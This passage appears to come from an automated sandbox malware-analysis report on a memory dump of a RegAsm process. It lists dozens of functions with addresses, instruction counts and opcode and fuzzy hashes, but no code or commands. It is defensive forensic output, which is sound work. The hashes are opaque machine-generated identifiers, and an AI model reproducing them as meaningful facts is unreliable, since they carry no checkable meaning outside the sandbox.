Download Yara Rule

Strings

,, xrefs: 00407756

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 086b8574d857a839883eda2a1e9c8841ed02e8747b8a9b1b408e3f092376d765
Instruction ID: ce4baaaa9bad556813f04048edb8e67ae7d8aaf0b36efba66cc6543f19850dd1
Opcode Fuzzy Hash: 086b8574d857a839883eda2a1e9c8841ed02e8747b8a9b1b408e3f092376d765
Instruction Fuzzy Hash: 67B1387150C3819FD325DF18C88061BBBE0AFAA704F444E2DE5D997382D635E918CBA7

Function 00423DB0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 00423FAE

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 0d66f03c86defd6c0d574682a943496a6a60e64cd566f04aae35a2a64a3ec47f
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: AC71F632B083254BD714CE28E58031FB7F2ABC5710F9A852FE5949B395D23DDD498B8A

Function 00418666 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

`, xrefs: 004189E9

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: b556939803ae7553e197100baf7339dc62c0910a0d933a1c0de427fc9aea6f8b
Instruction ID: 38db1f4de6b6fdb6783522f53655d3bf1f641c9f49faa975e50294c499247a82
Opcode Fuzzy Hash: b556939803ae7553e197100baf7339dc62c0910a0d933a1c0de427fc9aea6f8b
Instruction Fuzzy Hash: 57918EF18197808BD300BF78A90A60BBFE0EB51709F85492DD4D94B343E2B9D558DBA3

Function 00402733 Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

"(@, xrefs: 00402815

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "(@
API String ID: 0-4010386598
Opcode ID: 4f2612ec87c40a65f6fe7f6c0ccc18d5ab9f9b3812a4e87e83b5264c5a30b994
Instruction ID: fe6aa5c142f3a42d75a8084e747fc8178cc38c63e58a472ee0f40ea0e47d78d9
Opcode Fuzzy Hash: 4f2612ec87c40a65f6fe7f6c0ccc18d5ab9f9b3812a4e87e83b5264c5a30b994
Instruction Fuzzy Hash: FD81E179610141CFDB1CCF58C8622BA77F2FFC5301B1881BEC4869B296DB399A52CB90

Function 0043E8C2 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

"C, xrefs: 0043E90B

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "C
API String ID: 0-2206442469
Opcode ID: c034401baec348819eba8d2bbd17c7ec62e457f0f011cc18eab0c946fb23d0d8
Instruction ID: 935d4f17403e8db5b5b8c16b63db543b8aa0d3d2cb707de03b8e5cc2deff2bf2
Opcode Fuzzy Hash: c034401baec348819eba8d2bbd17c7ec62e457f0f011cc18eab0c946fb23d0d8
Instruction Fuzzy Hash: 6871A936608211CFC704DF29E98060AB7E2BF8A315F1A8ABDD58983361D375ED54CB86

Function 00402709 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

"(@, xrefs: 00402815

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "(@
API String ID: 0-4010386598
Opcode ID: 935da31424566d1c4ea8bc4e54425f15cf2cc9b805937eeee4de00505dbc7485
Instruction ID: 501b255467e28e66df3dd704cd96e413d9ecbd4a02c243c72eaaba00a3b819a2
Opcode Fuzzy Hash: 935da31424566d1c4ea8bc4e54425f15cf2cc9b805937eeee4de00505dbc7485
Instruction Fuzzy Hash: A271D179601541CBDB1CCF64C8522BA77F2FFC9301B1881BEC4869B396DB389A52CB90

Function 00433B0B Relevance: .9, Instructions: 868COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a52190492a79039ed4fe893f1e9b69d1f0f8f1155781bb0e2a56010758c5370
Instruction ID: 60e10ff7576fc01af920e4e132f7d5e7a83bec24b17e2bed59f9da48ea92f3d3
Opcode Fuzzy Hash: 9a52190492a79039ed4fe893f1e9b69d1f0f8f1155781bb0e2a56010758c5370
Instruction Fuzzy Hash: 1272B6B1C192808AE7107F74DC0635EBEB0EF52309F4589AEE49C5B342E6794A58DB73

Function 00408C00 Relevance: .8, Instructions: 772COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae51cca837cac8ffe2bafaaf56dc69f050be8750044487ca94e4aeeed0694b7c
Instruction ID: 6ec334a39bab21cb6f0ae9d01879496b667b7f3b6cf8bfe4c56601167175411f
Opcode Fuzzy Hash: ae51cca837cac8ffe2bafaaf56dc69f050be8750044487ca94e4aeeed0694b7c
Instruction Fuzzy Hash: E742C3315087118BC724DF29D88066BB3E1FFD4315F158A3ED8D6A72C6E739A851CB8A

Function 00404490 Relevance: .7, Instructions: 695COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f134da010195dbb3cd55b6dd257cf1addff3c5ee2333cc8668103bcc800fd9b8
Instruction ID: 55a47f18f42749ca1b1b7c1e455610f1c0f5d4fbccde685b103b1962d8c4d318
Opcode Fuzzy Hash: f134da010195dbb3cd55b6dd257cf1addff3c5ee2333cc8668103bcc800fd9b8
Instruction Fuzzy Hash: E452E5B15083459FCB14CF28C0806AABBE1FFC5314F198A7EE99967381D778E945CB89

Function 00406F80 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb368eda9243d9d0f1bfee74c7f1af2f0d76db5922c9acac9dd3996cadefccf3
Instruction ID: 02aa1ade44f06ce571ddb265a7e562f953cde8e6e5cf30f11aa87c661043516f
Opcode Fuzzy Hash: cb368eda9243d9d0f1bfee74c7f1af2f0d76db5922c9acac9dd3996cadefccf3
Instruction Fuzzy Hash: 2812E736A0C3018BC714CF29C88166BFBD2BFC9314F198A6EE89997391D678DC45C796

Function 00404EE0 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798e31e84f8356c2ccad3559ab4cec9f511fdc50e45c16a900c75316a0fbb67c
Instruction ID: 2858e4a9d145dc21e937c2c6a7fc6d8bacdf580cfb569b5a36355d68b1898fa4
Opcode Fuzzy Hash: 798e31e84f8356c2ccad3559ab4cec9f511fdc50e45c16a900c75316a0fbb67c
Instruction Fuzzy Hash: A4320370514B118FC368CE29C69066BBBF1FF85710BA04A2ED69797B90D33AB845CF18

Function 0043BDC0 Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333b83b463e21d550beadf6797db485c6abffa7dceaea41e220f7011695e963e
Instruction ID: 7183bde25fe258677e7e37d236e4b71ac2baff46ad97dabec726e41ebb4c334c
Opcode Fuzzy Hash: 333b83b463e21d550beadf6797db485c6abffa7dceaea41e220f7011695e963e
Instruction Fuzzy Hash: BA12AD7060C3419FC315CF68C890B2BB7E1EF99318F249A2EE59597392D379D815CB8A

Function 004366C0 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e15989a8671538a081e744985f079b8daff5680ad78f3340bc0de0d34e9278e
Instruction ID: dbc3519d8850f0b8accb12798017df3747ab9962b4b1566f699b96840a1e9443
Opcode Fuzzy Hash: 5e15989a8671538a081e744985f079b8daff5680ad78f3340bc0de0d34e9278e
Instruction Fuzzy Hash: 3FF1F1B540D3819ED310EF68C55536FBBE0ABA6308F458C1EE1D98B342C679C944CB27

Function 0043EC60 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92668d6382d9d232adcdfffac20c64cc78213cd084e79911b1ac0c390efa1db8
Instruction ID: 61c5be5d37696ac5a5ea26ce6fbba27b0ef054df6820078b1986a9ca744001aa
Opcode Fuzzy Hash: 92668d6382d9d232adcdfffac20c64cc78213cd084e79911b1ac0c390efa1db8
Instruction Fuzzy Hash: 4DB1A93960D341CFC708DF28D89062BB7E2EB8A710F19896DE9C6473A1D335AD55CB86

Function 0043162B Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f8c6dbcf98f0c7b1e9f3f1412220d45e18ea76275beb0fd5b9ce1b13fc3d7b
Instruction ID: 1f7d98c80ff6b0d8bf8e7311f2d81671023236a96adcce939c5d32e029b1e245
Opcode Fuzzy Hash: e6f8c6dbcf98f0c7b1e9f3f1412220d45e18ea76275beb0fd5b9ce1b13fc3d7b
Instruction Fuzzy Hash: 71E116B18253808AD3017F74E95E30A7EB0DB5230AF85896DD9C84B387E27B855C9B77

Function 00418BBF Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f43ea0b866a6306ceb983d69f5763306a960cd9a35e6e37acce87f0ed8d9d1
Instruction ID: ce482f961ce88e73f0e893ac5b2d6956d433bf2c33d35fb5e2a7292ca7d91c28
Opcode Fuzzy Hash: b4f43ea0b866a6306ceb983d69f5763306a960cd9a35e6e37acce87f0ed8d9d1
Instruction Fuzzy Hash: 79C183F2C097808AD305BF74ED1634BBEB0EB12309F45486DD5E84B342E2758558EBA3

Function 00420458 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8875e5d0ab49532bebfd4996542ba76964aced3aeabe0f07f4fce56ee8b944d
Instruction ID: 328d35e50cf5e8114a8a56861995774d7c0ef7ba584079343ad04d542a47e9ff
Opcode Fuzzy Hash: b8875e5d0ab49532bebfd4996542ba76964aced3aeabe0f07f4fce56ee8b944d
Instruction Fuzzy Hash: 0A910474A08381CFD724CF28E89035A77E2BF8B310F49867DE599473D2D735A9458B46

Function 00440160 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7e8e24358d07cffec1f86fd18820362655dbbac93bd62c93eda38d437db0fd
Instruction ID: 786124fcc1e056303fd4cfb5e6473a7fba23261c1231bed6916790e880d0f322
Opcode Fuzzy Hash: 0c7e8e24358d07cffec1f86fd18820362655dbbac93bd62c93eda38d437db0fd
Instruction Fuzzy Hash: CD919C342083069BD724DF18D880A2FB7E1FF89754F14896DEA9587351E735EC61CB8A

Function 0043FE90 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb492e58066867b5ec1928da3883337531fb84d35cb4971490b483535e8b709b
Instruction ID: dea362992f291e6c50fe372c3f57c16c320594e38bf7ccd55e8575bb5226d680
Opcode Fuzzy Hash: eb492e58066867b5ec1928da3883337531fb84d35cb4971490b483535e8b709b
Instruction Fuzzy Hash: D281F535A093118FD714DF18D880A2BB3B2FF99714F15892DEA8557361D739EC11CB8A

Function 0043E950 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f711bed4df7e6f38b12aaa1766b984fe28733c62d3c51ab4116dfbe70a8208b
Instruction ID: 6e717b252bb59bb3e839e0c49262f3884fc61561fd51e257e2a34511e70a5084
Opcode Fuzzy Hash: 2f711bed4df7e6f38b12aaa1766b984fe28733c62d3c51ab4116dfbe70a8208b
Instruction Fuzzy Hash: 228195356093418FC704DF29D98061ABBE2BF8A314F198A6DE5C5873A1D339ED15CB86

Function 0042B4A1 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83a801ec0b676c4f8b265ecb9ba3669635362ec054497e07937516be2977edd
Instruction ID: 1cfd9f229b562307ebf672d6701017ecd337a8467bedb0fda39b272b93e82947
Opcode Fuzzy Hash: f83a801ec0b676c4f8b265ecb9ba3669635362ec054497e07937516be2977edd
Instruction Fuzzy Hash: 7191C7B111D3C0CEE310AFA5C61579BBFB1ABA2709F454C6ED2C887242D7B98584DB27

Function 00434B00 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b226965a47b4afb392980afe6cd5c73f8e2677b624d69f5a1905510e50ae641b
Instruction ID: f10fa2caafcb55f1130f954bce5a9acbff6d41249b72b3a9c5a889a81f56221f
Opcode Fuzzy Hash: b226965a47b4afb392980afe6cd5c73f8e2677b624d69f5a1905510e50ae641b
Instruction Fuzzy Hash: 0571A2B58152808BD700BF78AD4635EBEB0EF52309F568C9DD89C4B342E2358959DBA3

Function 00436460 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 298bd268bfd15b30a665f1931273faa37e561e295304eb205a53660cbc5c0ee5
Instruction ID: 8b34d40acf33476096aec2b115b81946483506dcb71b7bf6eb6cbf97659b5fac
Opcode Fuzzy Hash: 298bd268bfd15b30a665f1931273faa37e561e295304eb205a53660cbc5c0ee5
Instruction Fuzzy Hash: 78515DB15087549FE314DF29D49535BBBE1BBC8318F054A2EE4E987390E379DA088F86

Function 0042D483 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18b6a99f5e20e042ac8367b6e90a9adf31fe205a42dfb0568a8c37bc11851e2
Instruction ID: 004694b9f701b960fe4e51b82937f892120f4d66f1ea8e202012f4acfcc17eb5
Opcode Fuzzy Hash: d18b6a99f5e20e042ac8367b6e90a9adf31fe205a42dfb0568a8c37bc11851e2
Instruction Fuzzy Hash: AA91C9B111D3C0CEE310AFA4C61579BBFB1ABA2708F454C6ED2D887242D7B98584DB27

Function 0042A020 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f26a19c5f10af7fcabc886d8b20170232f1b4681faa5ddbf8a8d28c25ab708
Instruction ID: ec61c33a980bd02d85898b79ad2799d7360c7bb83715ba7dd23b9e34f694adb7
Opcode Fuzzy Hash: e9f26a19c5f10af7fcabc886d8b20170232f1b4681faa5ddbf8a8d28c25ab708
Instruction Fuzzy Hash: D081FEB100E7C18EE360AF64C91578FBAE0AFA2715F558C1ED0DC9B342C6798558DB27

Function 0043EF20 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6923178974d2aa82e7b7cafe18dba4a3c40b428f54d41a3c8650eb489b4429d6
Instruction ID: 30986e5ec778d9a93737609380dcda62242aea30448a7c8e0c576e52b0b88e5e
Opcode Fuzzy Hash: 6923178974d2aa82e7b7cafe18dba4a3c40b428f54d41a3c8650eb489b4429d6
Instruction Fuzzy Hash: 0551A93420D241CFD308DF28D9A062BB7F1EF8A710F59896DE9CA83391D3399855DB5A

Function 00422650 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39548e39931caa7b0e428f93792e15aff7b63e171535abe54d8788c7e065974b
Instruction ID: d8a74a44319423ad80e77b3b6dd4eaf93ed6be274b9757ccdbc1e6b586c706b8
Opcode Fuzzy Hash: 39548e39931caa7b0e428f93792e15aff7b63e171535abe54d8788c7e065974b
Instruction Fuzzy Hash: B35156B460C380ABD314DF15D981A2BBBE5AB86704F105A1CF2C55B2A0C7B59915CB9B

Function 0042548A Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb2348d70af2bfe18625e3e2bcb30913d4c443e3e927af0cea7029bcab5b664
Instruction ID: c20754f186cee21f0c050c8975408cadea82bb23d6adeaed4c3540bd06e18fad
Opcode Fuzzy Hash: 7eb2348d70af2bfe18625e3e2bcb30913d4c443e3e927af0cea7029bcab5b664
Instruction Fuzzy Hash: BB519FF1C157808BD705AF68D90625EBFF0EF12309F86885DE4D89B306E2758958DB63

Function 0040D570 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04441af874c0142ed7b704837bd42a1c04e4618d248514924117806d98c0026
Instruction ID: 5bfa51393ff2afcc53a608154e6fafe652b9b0abcff9e4516a9246bc811c9469
Opcode Fuzzy Hash: b04441af874c0142ed7b704837bd42a1c04e4618d248514924117806d98c0026
Instruction Fuzzy Hash: 7E413632B0C3501FC318CE798C9012ABAD29BC1224F19C73EF4A6C73D5E674C90A9761

Function 0042527C Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f45a6be9729795109499234c859368fba171ccbb1fbba88191cacc950898892
Instruction ID: 9b803956ec6fe88f9b05f561337eaeb20394aa847324b059245e823c7af1d6f9
Opcode Fuzzy Hash: 3f45a6be9729795109499234c859368fba171ccbb1fbba88191cacc950898892
Instruction Fuzzy Hash: 41517FF1C147808BD705BF68E90625EBEF0EF12309F8A885DE4D85B306E2758558DB63

Function 0043B780 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269aea4367d8b195b65dbd25a2bcf60205449b1cb7e14ae261f64960949f7e0f
Instruction ID: 908779744a50c886fdfb48ef7085785bf96a1ba97f5235cf98f88e4c2cb52908
Opcode Fuzzy Hash: 269aea4367d8b195b65dbd25a2bcf60205449b1cb7e14ae261f64960949f7e0f
Instruction Fuzzy Hash: 674135B4509340ABD305EF18C584B2BFBE5EF89708F14991EE5889B211C339DD098BAA

Function 00413243 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208c11d1d1212eebd632c1e908712397252a93e734be82360eff1662109c3ee0
Instruction ID: 27c75d0aebb76f98100ca2769a0fbc7689293c8d38f1e8ecbb85c4d8cc670ac9
Opcode Fuzzy Hash: 208c11d1d1212eebd632c1e908712397252a93e734be82360eff1662109c3ee0
Instruction Fuzzy Hash: 2B2160B18083959BD710DF10D881BEBB7F8EF86305F44486EE9C853141E739AA58C76A

Function 00432810 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: e977d02c96d37fd101c923e893922fa36958090dc23989710f983032e397c7b6
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 64114C33B051E40EC31A9D3C8500565BFE31A97234F2D539AF4F89B2D2D6278D8B8359

Function 004233D0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead695a6ed89273a53d4e33bb9546c1427c357c1d290a1b26373d736c1f6816f
Instruction ID: 918542cf1c0f9efb131a036d0ea97fe0f44891b8720e1dc886b21b0234ddc72f
Opcode Fuzzy Hash: ead695a6ed89273a53d4e33bb9546c1427c357c1d290a1b26373d736c1f6816f
Instruction Fuzzy Hash: E1019EB170031147D721AE11B4C0B2BA3B86F80719F58843EE80597342DB7EEE0AC699

Function 00404130 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a64d2fd6459f31ee5ccce9f35c62339457d2903cab4a422eb3c7ede1238b3a
Instruction ID: 99319fb28939d92b8a8d02846bd03aac87bf5d1fd6dd9ad2e1f934f06ce26b6a
Opcode Fuzzy Hash: b4a64d2fd6459f31ee5ccce9f35c62339457d2903cab4a422eb3c7ede1238b3a
Instruction Fuzzy Hash: 3EF0E97A7152160BA210DDB5ECC4927F75AE7DA324B19453EEE41E7381C531E841C2A9

Function 004134A0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f1f74d1560c1524e64c45067f49c651a4018ea7e60260d481f551f3e5ff087
Instruction ID: d45323d058c98a91cf1c8b373323774cd30c6b2d31d4b6232148180ec157aa97
Opcode Fuzzy Hash: 21f1f74d1560c1524e64c45067f49c651a4018ea7e60260d481f551f3e5ff087
Instruction Fuzzy Hash: C6F0A7B1A041106BDB339D559C80F77BB9CCB87319F290427E84557242D16A998583E9

Function 00439CF0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: cc8b94c7ea5ca84d6b538ba0cad61e3a9ce0a1f7ab355f74c7074a24fdff4a9f
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
